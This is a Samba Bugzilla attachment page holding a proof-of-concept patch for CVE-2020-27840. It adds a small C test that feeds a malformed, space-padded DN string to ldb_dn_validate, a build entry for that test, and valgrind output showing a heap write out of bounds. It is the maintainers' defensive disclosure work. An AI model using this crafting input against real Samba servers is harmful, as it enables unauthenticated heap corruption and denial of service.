The Samba-Bugzilla – Attachment 16365 Details for
Bug 14595
CVE-2020-27840 [SECURITY] Unauthenticated remote heap corruption via bad DNs
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
New Account
|
Log In
[x]
|
Forgot Password
Login:
[x]
[patch]
proof of concept
0001-POC-crash-for-ldb_dn_expode.patch (text/plain), 2.83 KB, created by
Douglas Bagnall
on 2020-12-11 03:42:08 UTC
(
hide
)
Description:
proof of concept
Filename:
MIME Type:
Creator:
Douglas Bagnall
Created:
2020-12-11 03:42:08 UTC
Size:
2.83 KB
patch
obsolete
>From c7f8bac84bd8865c4a3b210e881310e547321e0d Mon Sep 17 00:00:00 2001 >From: Douglas Bagnall <douglas.bagnall@catalyst.net.nz> >Date: Fri, 11 Dec 2020 16:30:35 +1300 >Subject: [PATCH 1/2] POC crash for ldb_dn_expode > >$ make -j >$ valgrind bin/default/lib/ldb/explode_ldb_dn_explode >==1732366== Memcheck, a memory error detector >==1732366== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al. >==1732366== Using Valgrind-3.15.0 and LibVEX; rerun with -h for copyright info >==1732366== Command: bin/default/lib/ldb/explode_ldb_dn_explode >==1732366== >==1732366== Invalid write of size 1 >==1732366== at 0x48667CE: ldb_dn_explode (ldb_dn.c:722) >==1732366== by 0x48669DA: ldb_dn_validate (ldb_dn.c:754) >==1732366== by 0x1091E0: main (explode_ldb_dn_explode.c:12) >==1732366== Address 0x4c157a7 is 9 bytes before a block of size 211 alloc'd >==1732366== at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) >==1732366== by 0x4AD2365: __talloc_with_prefix (talloc.c:783) >==1732366== by 0x4AD24FF: __talloc (talloc.c:825) >==1732366== by 0x4AD299C: _talloc_named_const (talloc.c:982) >==1732366== by 0x4AD6B26: _talloc_array (talloc.c:2763) >==1732366== by 0x4865B71: ldb_dn_explode (ldb_dn.c:343) >==1732366== by 0x48669DA: ldb_dn_validate (ldb_dn.c:754) >==1732366== by 0x1091E0: main (explode_ldb_dn_explode.c:12) >==1732366== > > >Signed-off-by: Douglas Bagnall <douglas.bagnall@catalyst.net.nz> >--- > lib/ldb/tests/explode_ldb_dn_explode.c | 14 ++++++++++++++ > lib/ldb/wscript | 5 +++++ > 2 files changed, 19 insertions(+) > create mode 100644 lib/ldb/tests/explode_ldb_dn_explode.c > >diff --git a/lib/ldb/tests/explode_ldb_dn_explode.c b/lib/ldb/tests/explode_ldb_dn_explode.c >new file mode 100644 >index 00000000000..51d9ba36a2a >--- /dev/null >+++ b/lib/ldb/tests/explode_ldb_dn_explode.c >@@ -0,0 +1,14 @@ >+#include "includes.h" >+#include "ldb.h" >+ >+int main(int argc, char * argv[]) >+{ >+ const char *str_dn = ("a=b " >+ " " >+ " ,c= "); >+ >+ struct ldb_context *ldb = ldb_init(NULL, NULL); >+ struct ldb_dn *dn = ldb_dn_new(ldb, ldb, str_dn); >+ ldb_dn_validate(dn); >+ return 0; >+} >diff --git a/lib/ldb/wscript b/lib/ldb/wscript >index f374f64aeab..027d55c187e 100644 >--- a/lib/ldb/wscript >+++ b/lib/ldb/wscript >@@ -497,6 +497,11 @@ def build(bld): > deps='cmocka ldb', > install=False) > >+ bld.SAMBA_BINARY('explode_ldb_dn_explode', >+ source='tests/explode_ldb_dn_explode.c', >+ deps='ldb', >+ install=False) >+ > bld.SAMBA_BINARY('ldb_match_test', > source='tests/ldb_match_test.c', > deps='cmocka ldb', >-- >2.25.1 >
<b>You cannot view the attachment while viewing its details because your browser does not support IFRAMEs. <a href="attachment.cgi?id=16365">View the attachment on a separate page</a>.</b>
View Attachment As Raw
Actions:
View
Attachments on
bug 14595
: 16365 |
16366
|
16383
|
16441
|
16442
|
16444
|
16445
|
16446
|
16447
|
16448
|
16449
|
16460
|
16461
|
16462
|
16463
|
16464
|
16530
|
16547